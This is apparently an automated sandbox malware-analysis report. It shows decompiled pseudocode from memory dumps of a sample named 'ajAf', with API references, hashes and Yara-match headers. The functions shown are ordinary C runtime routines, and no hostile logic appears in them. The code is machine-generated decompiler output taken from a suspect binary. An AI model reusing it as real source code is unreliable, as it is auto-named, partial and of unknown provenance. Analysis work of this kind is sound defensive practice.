                                                          								} else {
                                                          									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                          								}
                                                          								__eflags = _t131;
                                                          								if(_t131 == 0) {
                                                          									L40:
                                                          									return _a16;
                                                          								} else {
                                                          									do {
                                                          										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                          										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                          											L24:
                                                          											__eflags = _t120 - _v16;
                                                          											if(_t120 < _v16) {
                                                          												_t97 = E0040FC07(_t120, _t125, _t133);
                                                          												__eflags = _t97 - 0xffffffff;
                                                          												if(_t97 == 0xffffffff) {
                                                          													L48:
                                                          													return (_t131 - _t120) / _a12;
                                                          												}
                                                          												__eflags = _v8;
                                                          												if(_v8 == 0) {
                                                          													L44:
                                                          													__eflags = _a8 - 0xffffffff;
                                                          													if(__eflags != 0) {
                                                          														E0040BA30(_t131, _a4, 0, _a8);
                                                          														_t134 = _t134 + 0xc;
                                                          													}
                                                          													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                          													_push(0);
                                                          													_push(0);
                                                          													_push(0);
                                                          													_push(0);
                                                          													_push(0);
                                                          													L4:
                                                          													E0040E744(_t125, _t131, _t133);
                                                          													goto L5;
                                                          												}
                                                          												_t123 = _v12;
                                                          												_v12 = _v12 + 1;
                                                          												 *_v12 = _t97;
                                                          												_t120 = _t120 - 1;
                                                          												_t70 =  &_v8;
                                                          												 *_t70 = _v8 - 1;
                                                          												__eflags =  *_t70;
                                                          												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                          												goto L39;
                                                          											}
                                                          											__eflags = _v16;
                                                          											if(_v16 == 0) {
                                                          												_t105 = 0x7fffffff;
                                                          												__eflags = _t120 - 0x7fffffff;
                                                          												if(_t120 <= 0x7fffffff) {
                                                          													_t105 = _t120;
                                                          												}
                                                          											} else {
                                                          												__eflags = _t120 - 0x7fffffff;
                                                          												if(_t120 <= 0x7fffffff) {
                                                          													_t55 = _t120 % _v16;
                                                          													__eflags = _t55;
                                                          													_t125 = _t55;
                                                          													_t110 = _t120;
                                                          												} else {
                                                          													_t125 = 0x7fffffff % _v16;
                                                          													_t110 = 0x7fffffff;
                                                          												}
                                                          												_t105 = _t110 - _t125;
                                                          											}
                                                          											__eflags = _t105 - _v8;
                                                          											if(_t105 > _v8) {
                                                          												goto L44;
                                                          											} else {
                                                          												_push(_t105);
                                                          												_push(_v12);
                                                          												_t106 = E0040FA20(_t125, _t131, _t133);
                                                          												_pop(_t123);
                                                          												_push(_t106);
                                                          												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                          												_t134 = _t134 + 0xc;
                                                          												__eflags = _t107;
                                                          												if(_t107 == 0) {
                                                          													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                          													goto L48;
                                                          												}
                                                          												__eflags = _t107 - 0xffffffff;
                                                          												if(_t107 == 0xffffffff) {
                                                          													L47:
                                                          													_t80 = _t133 + 0xc;
                                                          													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                          													__eflags =  *_t80;
                                                          													goto L48;
                                                          												}
                                                          												_v12 = _v12 + _t107;
                                                          												_t120 = _t120 - _t107;
                                                          												_v8 = _v8 - _t107;
                                                          												goto L39;
                                                          											}
                                                          										}
                                                          										_t113 =  *(_t133 + 4);
                                                          										__eflags = _t113;
                                                          										if(__eflags == 0) {
                                                          											goto L24;
                                                          										}
                                                          										if(__eflags < 0) {
                                                          											goto L47;
                                                          										}
                                                          										_t131 = _t120;
                                                          										__eflags = _t120 - _t113;
                                                          										if(_t120 >= _t113) {
                                                          											_t131 = _t113;
                                                          										}
                                                          										__eflags = _t131 - _v8;
                                                          										if(_t131 > _v8) {
                                                          											_t133 = 0;
                                                          											__eflags = _a8 - 0xffffffff;
                                                          											if(__eflags != 0) {
                                                          												E0040BA30(_t131, _a4, 0, _a8);
                                                          												_t134 = _t134 + 0xc;
                                                          											}
                                                          											_t114 = E0040BFC1(__eflags);
                                                          											_push(_t133);
                                                          											_push(_t133);
                                                          											_push(_t133);
                                                          											_push(_t133);
                                                          											 *_t114 = 0x22;
                                                          											_push(_t133);
                                                          											goto L4;
                                                          										} else {
                                                          											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                          											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                          											 *_t133 =  *_t133 + _t131;
                                                          											_v12 = _v12 + _t131;
                                                          											_t120 = _t120 - _t131;
                                                          											_t134 = _t134 + 0x10;
                                                          											_v8 = _v8 - _t131;
                                                          											_t131 = _v20;
                                                          										}
                                                          										L39:
                                                          										__eflags = _t120;
                                                          									} while (_t120 != 0);
                                                          									goto L40;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t118 = _t90 | 0xffffffff;
                                                          						_t90 = _t118 / _a12;
                                                          						_t125 = _t118 % _a12;
                                                          						__eflags = _a16 - _t90;
                                                          						if(_a16 <= _t90) {
                                                          							goto L13;
                                                          						}
                                                          						goto L9;
                                                          					}
                                                          					L3:
                                                          					_t92 = E0040BFC1(_t138);
                                                          					_push(_t131);
                                                          					_push(_t131);
                                                          					_push(_t131);
                                                          					_push(_t131);
                                                          					 *_t92 = 0x16;
                                                          					_push(_t131);
                                                          					goto L4;
                                                          				}
                                                          			}






























                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                          • String ID:
                                                          • API String ID: 3886058894-0
                                                          • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                          • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                          • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                          • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                          • String ID:
                                                          • API String ID: 3886058894-0
                                                          • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                          • Instruction ID: 470f303bc4884362e2cd49405cb72f0af0431b1bb1ea95c1f3a8645556a84fbf
                                                          • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                          • Instruction Fuzzy Hash: 54511571D0020BEBDB208FAD8E4559EBBB5EF91B60F14821DE82D92290D7738A51EF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __fileno$__getptd_noexit__lock_file
                                                          • String ID: 'B
                                                          • API String ID: 3755561058-2787509829
                                                          • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                          • Instruction ID: 449411163c578d925a2a08468c3e944840100b366d751407b85c31cd14c02e24
                                                          • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                          • Instruction Fuzzy Hash: C9018E33610A1356C321AB7C5F414AEFBA08EA6F70325430CD079DB5D1EB2AC602B255
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                          				signed int _t13;
                                                          				intOrPtr _t28;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          
                                                          				_t30 = __eflags;
                                                          				_t26 = __edi;
                                                          				_t25 = __edx;
                                                          				_t22 = __ebx;
                                                          				_push(0xc);
                                                          				_push(0x4214d0);
                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                          				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                          				_t13 =  *0x422e34; // 0xfffffffe
                                                          				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                          					L6:
                                                          					E0040D6E0(_t22, 0xc);
                                                          					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                          					_t8 = _t28 + 0x6c; // 0x6c
                                                          					_t26 =  *0x422f18; // 0x422e40
                                                          					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                          					 *(_t29 - 4) = 0xfffffffe;
                                                          					E004147A2();
                                                          				} else {
                                                          					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                          					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                          						goto L6;
                                                          					} else {
                                                          						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                          					}
                                                          				}
                                                          				if(_t28 == 0) {
                                                          					E0040E79A(_t25, _t26, 0x20);
                                                          				}
                                                          				return E0040E21D(_t28);
                                                          			}








                                                          APIs
                                                          • __getptd.LIBCMT ref: 00414744
                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                          • __getptd.LIBCMT ref: 0041475B
                                                          • __amsg_exit.LIBCMT ref: 00414769
                                                          • __lock.LIBCMT ref: 00414779
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                          • String ID: @.B
                                                          • API String ID: 3521780317-470711618
                                                          • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                          • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                          • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                          • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __getptd.LIBCMT ref: 01FD49AB
                                                            • Part of subcall function 01FD099C: __getptd_noexit.LIBCMT ref: 01FD099F
                                                            • Part of subcall function 01FD099C: __amsg_exit.LIBCMT ref: 01FD09AC
                                                          • __getptd.LIBCMT ref: 01FD49C2
                                                          • __amsg_exit.LIBCMT ref: 01FD49D0
                                                          • __lock.LIBCMT ref: 01FD49E0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                          • String ID: @.B
                                                          • API String ID: 3521780317-470711618
                                                          • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                          • Instruction ID: 444adc871db387376cf3a173ba6198d987b7f512d36c60c2a0270ab28544c528
                                                          • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                          • Instruction Fuzzy Hash: D1F09032A40712DBEB20FB699E0576D77A16F10B20F49011AD446A7AD1CB76A801DB97
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___addlocaleref.LIBCMT ref: 01FD4973
                                                          • ___removelocaleref.LIBCMT ref: 01FD497E
                                                          • ___freetlocinfo.LIBCMT ref: 01FD4992
                                                            • Part of subcall function 01FD46F0: ___free_lconv_mon.LIBCMT ref: 01FD4736
                                                            • Part of subcall function 01FD46F0: ___free_lconv_num.LIBCMT ref: 01FD4757
                                                            • Part of subcall function 01FD46F0: ___free_lc_time.LIBCMT ref: 01FD47DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                          • String ID: @.B$@.B
                                                          • API String ID: 4212647719-183327057
                                                          • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                          • Instruction ID: 7e577fed6a646d13fadd55450b7d4b594e23130168e2b4b377a7b349ec3e1e29
                                                          • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                          • Instruction Fuzzy Hash: 2AE02032D11A32C5D631771E7C0037EA6570F91111B1F311EE58AE7844DB374841C097
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                          				intOrPtr _v8;
                                                          				void* _t16;
                                                          				void* _t17;
                                                          				intOrPtr _t19;
                                                          				void* _t21;
                                                          				signed int _t22;
                                                          				intOrPtr* _t27;
                                                          				intOrPtr _t39;
                                                          				intOrPtr _t40;
                                                          				intOrPtr _t50;
                                                          
                                                          				_t37 = __edx;
                                                          				_push(8);
                                                          				_push(0x421140);
                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                          				_t39 = _a4;
                                                          				_t50 = _t39;
                                                          				_t51 = _t50 != 0;
                                                          				if(_t50 != 0) {
                                                          					E0040FB29(_t39);
                                                          					_v8 = 0;
                                                          					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                          					_t16 = E0040FA20(__edx, _t39, _t39);
                                                          					__eflags = _t16 - 0xffffffff;
                                                          					if(_t16 == 0xffffffff) {
                                                          						L6:
                                                          						_t17 = 0x4227e0;
                                                          					} else {
                                                          						_t21 = E0040FA20(__edx, _t39, _t39);
                                                          						__eflags = _t21 - 0xfffffffe;
                                                          						if(_t21 == 0xfffffffe) {
                                                          							goto L6;
                                                          						} else {
                                                          							_t22 = E0040FA20(__edx, _t39, _t39);
                                                          							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                          						}
                                                          					}
                                                          					_t9 = _t17 + 4; // 0xa80
                                                          					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                          					_v8 = 0xfffffffe;
                                                          					E0040C735(_t39);
                                                          					_t19 = 0;
                                                          					__eflags = 0;
                                                          				} else {
                                                          					_t27 = E0040BFC1(_t51);
                                                          					_t40 = 0x16;
                                                          					 *_t27 = _t40;
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					E0040E744(__edx, _t40, 0);
                                                          					_t19 = _t40;
                                                          				}
                                                          				return E0040E21D(_t19);
                                                          			}














                                                          APIs
                                                          • __lock_file.LIBCMT ref: 0040C6C8
                                                          • __fileno.LIBCMT ref: 0040C6D6
                                                          • __fileno.LIBCMT ref: 0040C6E2
                                                          • __fileno.LIBCMT ref: 0040C6EE
                                                          • __fileno.LIBCMT ref: 0040C6FE
                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2805327698-0
                                                          • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                          • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                          • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                          • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
                                                          			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                          				signed int _t15;
                                                          				LONG* _t21;
                                                          				long _t23;
                                                          				void* _t31;
                                                          				LONG* _t33;
                                                          				void* _t34;
                                                          				void* _t35;
                                                          
                                                          				_t35 = __eflags;
                                                          				_t29 = __edx;
                                                          				_t25 = __ebx;
                                                          				_push(0xc);
                                                          				_push(0x421490);
                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                          				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                          				_t15 =  *0x422e34; // 0xfffffffe
                                                          				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                          					E0040D6E0(_t25, 0xd);
                                                          					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                          					_t33 =  *(_t31 + 0x68);
                                                          					 *(_t34 - 0x1c) = _t33;
                                                          					__eflags = _t33 -  *0x422d38; // 0x2291648
                                                          					if(__eflags != 0) {
                                                          						__eflags = _t33;
                                                          						if(_t33 != 0) {
                                                          							_t23 = InterlockedDecrement(_t33);
                                                          							__eflags = _t23;
                                                          							if(_t23 == 0) {
                                                          								__eflags = _t33 - 0x422910;
                                                          								if(__eflags != 0) {
                                                          									_push(_t33);
                                                          									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                          								}
                                                          							}
                                                          						}
                                                          						_t21 =  *0x422d38; // 0x2291648
                                                          						 *(_t31 + 0x68) = _t21;
                                                          						_t33 =  *0x422d38; // 0x2291648
                                                          						 *(_t34 - 0x1c) = _t33;
                                                          						InterlockedIncrement(_t33);
                                                          					}
                                                          					 *(_t34 - 4) = 0xfffffffe;
                                                          					E00414067();
                                                          				} else {
                                                          					_t33 =  *(_t31 + 0x68);
                                                          				}
                                                          				if(_t33 == 0) {
                                                          					E0040E79A(_t29, _t31, 0x20);
                                                          				}
                                                          				return E0040E21D(_t33);
                                                          			}











                                                          APIs
                                                          • __getptd.LIBCMT ref: 00413FD8
                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                          • __amsg_exit.LIBCMT ref: 00413FF8
                                                          • __lock.LIBCMT ref: 00414008
                                                          • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                          • InterlockedIncrement.KERNEL32(02291648), ref: 00414050
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                          • String ID:
                                                          • API String ID: 4271482742-0
                                                          • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                          • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                          • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                          • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __getptd.LIBCMT ref: 01FD423F
                                                            • Part of subcall function 01FD099C: __getptd_noexit.LIBCMT ref: 01FD099F
                                                            • Part of subcall function 01FD099C: __amsg_exit.LIBCMT ref: 01FD09AC
                                                          • __amsg_exit.LIBCMT ref: 01FD425F
                                                          • __lock.LIBCMT ref: 01FD426F
                                                          • InterlockedDecrement.KERNEL32(?), ref: 01FD428C
                                                          • InterlockedIncrement.KERNEL32(00422D38), ref: 01FD42B7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                          • String ID:
                                                          • API String ID: 4271482742-0
                                                          • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                          • Instruction ID: a4bd60743465c820b91b665056ac8138a5f467a7a48bc6795e9d93e8cdd204cb
                                                          • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                          • Instruction Fuzzy Hash: FA01D631E01622EBE721AB68DD057BEBB61BF44B21F480019E810A7A90C7766581DFD9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $2$l
                                                          • API String ID: 0-3132104027
                                                          • Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                          • Instruction ID: 97be57f3a83f623b6e1bb14e7dd0fb0663b5164294672e90f1d09037735723d4
                                                          • Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                          • Instruction Fuzzy Hash: AF41A035C4826DCEEF358A2998883F87BB7AB01315F1C01CAC59A67191C7774A87CF46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __calloc_crt
                                                          • String ID: P$B$`$B
                                                          • API String ID: 3494438863-235554963
                                                          • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                          • Instruction ID: d8bf386e8d0a2c58d63eaeb07c3c13fd7af85b23a35547044b8a37d036fa2e20
                                                          • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                          • Instruction Fuzzy Hash: 58112C72B086135BE728CF1CBE60B757793EB84B34764423EE621CB2A4E771D4835648
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 65%
                                                          			E00413610() {
                                                          				signed long long _v12;
                                                          				signed int _v20;
                                                          				signed long long _v28;
                                                          				signed char _t8;
                                                          
                                                          				_t8 = GetModuleHandleA("KERNEL32");
                                                          				if(_t8 == 0) {
                                                          					L6:
                                                          					_v20 =  *0x41fb50;
                                                          					_v28 =  *0x41fb48;
                                                          					asm("fsubr qword [ebp-0x18]");
                                                          					_v12 = _v28 / _v20 * _v20;
                                                          					asm("fld1");
                                                          					asm("fcomp qword [ebp-0x8]");
                                                          					asm("fnstsw ax");
                                                          					if((_t8 & 0x00000005) != 0) {
                                                          						return 0;
                                                          					} else {
                                                          						return 1;
                                                          					}
                                                          				} else {
                                                          					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                          					if(__eax == 0) {
                                                          						goto L6;
                                                          					} else {
                                                          						_push(0);
                                                          						return __eax;
                                                          					}
                                                          				}
                                                          			}








                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                          • API String ID: 1646373207-3105848591
                                                          • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                          • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                          • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                          • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                          				void* __ebx;
                                                          				void* __ebp;
                                                          				signed int _t12;
                                                          				void* _t21;
                                                          				int _t25;
                                                          				void* _t30;
                                                          				int _t32;
                                                          				char* _t35;
                                                          
                                                          				_t21 = __edx;
                                                          				_t35 = _a4;
                                                          				_t17 = __ecx;
                                                          				if(_t35 != 0) {
                                                          					_t25 = lstrlenA(_t35) + 1;
                                                          					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                          					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25);
                                                          					asm("sbb esi, esi");
                                                          					_t30 =  ~_t12 + 1;
                                                          					if(_t30 != 0) {
                                                          						_t12 = GetLastError();
                                                          						if(_t12 == 0x7a) {
                                                          							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                          							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                          							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                          							asm("sbb esi, esi");
                                                          							_t30 =  ~_t12 + 1;
                                                          						}
                                                          						if(_t30 != 0) {
                                                          							_t12 = E00401030();
                                                          						}
                                                          					}
                                                          					return _t12;
                                                          				} else {
                                                          					 *__ecx = _t35;
                                                          					return __eax;
                                                          				}
                                                          			}












                                                          APIs
                                                          • lstrlenA.KERNEL32(?), ref: 00401906
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                          • GetLastError.KERNEL32 ref: 00401940
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
